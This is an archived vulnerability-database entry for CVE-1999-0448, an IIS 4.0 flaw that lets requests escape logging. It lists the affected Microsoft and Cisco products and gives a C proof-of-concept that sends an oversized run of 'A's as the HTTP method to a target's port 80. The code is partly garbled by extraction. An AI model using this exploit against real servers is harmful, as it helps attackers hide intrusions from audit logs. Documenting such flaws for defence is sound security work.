exploits , vulnerabilities , articles , NT IIS4 Log Avoidance Vulnerability

Title	NT IIS4 Log Avoidance Vulnerability
Published	1999-01-22-12:00AM
Updated	1999-06-01-12:00AM
Class	Failure to Handle Exceptional Conditions
CVE	CVE-1999-0448
Remote	Yes
Local	Unknown
Credit	This vulnerability was posted to NTBugtraq by David Litchfield (Mnemonix)
Vulnerable	Microsoft IIS 4.0 Cisco Building Broadband Service Manager 5.0 Cisco Call Manager 1.0 Cisco Call Manager 2.0 Cisco Call Manager 3.0 Cisco ICS 7750 Cisco IP/VC 3540 Video Rate Matching Module Cisco Unity Server 2.0 Cisco Unity Server 2.2 Cisco Unity Server 2.3 Cisco Unity Server 2.4 Cisco uOne 1.0 Cisco uOne 2.0 Cisco uOne 3.0 Cisco uOne 4.0 Microsoft BackOffice 4.0 Microsoft BackOffice 4.5 Microsoft Windows NT 4.0 Option Pack
Not Vulnerable
Code	/* Compile with eg Visual C++ and link with wsock32.lib #include <stdio.h> #include <winsock2.h> #include <string.h> int main (int argc, char argv[]) { int snd, rcv, err, portno,a=0,b, res; char resp[1024]; WORD wVersionRequested; WSADATA wsaData; struct sockaddr_in sa; struct hostent he; SOCKET sock; if (argc !=2) { printf("Usage: c:\>%s target_machine David Litchfield 21st January 1999 ", argv[0]); return 0; } wVersionRequested = MAKEWORD( 2, 0 ); err = WSAStartup( wVersionRequested, &wsaData ); if ( err != 0 ) { printf("No winsock.dll "); return 0; } if ( LOBYTE( wsaData.wVersion ) != 2 \|\| HIBYTE( wsaData.wVersion ) != 0 ) { printf("No winsock.dll - 2nd "); WSACleanup( ); return 0; } if ((he = gethostbyname(argv[1])) == NULL) { printf("Invalid Host "); return 0; } sock=socket(AF_INET,SOCK_STREAM,0); if (sock==INVALID_SOCKET) { printf("Invalid Socket! "); return 0; } else { printf(""); } sa.sin_addr.s_addr=INADDR_ANY; sa.sin_family=AF_INET; bind(sock,(struct sockaddr )&sa,sizeof(sa)); sa.sin_port=htons(80); memcpy(&sa.sin_addr,he->h_addr,he->h_length); if(connect(sock,(struct sockaddr )&sa,sizeof(sa)) < 0) { printf("Failed to connect! "); } else { /* This loop creates the REQUEST_METHOD and makes it 10140 bytes long while (a < 10141) { snd=send(sock,"A", 1, 0); a ++; } snd=send(sock," /default.asp HTTP/1.0 ",43,0); rcv=recv(sock,resp,256,0); printf(" %s",resp); rcv=recv(sock,resp,1024,0); printf(" %s ",resp); } closesocket(sock); return 0; }
TXT

Vulnerabilities - newest 10 RSS | More

2009-12-18 Drupal Contact and Menu Modules Multiple HTML Injection Vulnerabilities
2009-12-18 Mozilla Firefox and SeaMonkey NTLM Credential Reflection Authentication Bypass Vulnerability
2009-12-18 Mozilla Firefox CVE-2009-3982 JavaScript Engine Multiple Remote Memory Corruption Vulnerabilities
2009-12-17 Zen Cart Insecure File and Programs Information Disclosure and Database Deletion Vulnerability
2009-12-17 Winamp Module Decoder Plugin Multiple Buffer Overflow Vulnerabilities
2009-12-17 Winamp JPEG and PNG Multiple Integer Overflow Vulnerabilities
2009-12-17 HP OpenView Storage Data Protector Stack Buffer Overflow Vulnerability
2009-12-17 IBM WebSphere Application Server Feature Pack for CEA Spoofing Vulnerability
2009-12-17 Digital Scribe Cross Site Scripting and SQL Injection Vulnerabilities
2009-12-17 WP-Forum WordPress Plugin Multiple SQL Injection Vulnerabilities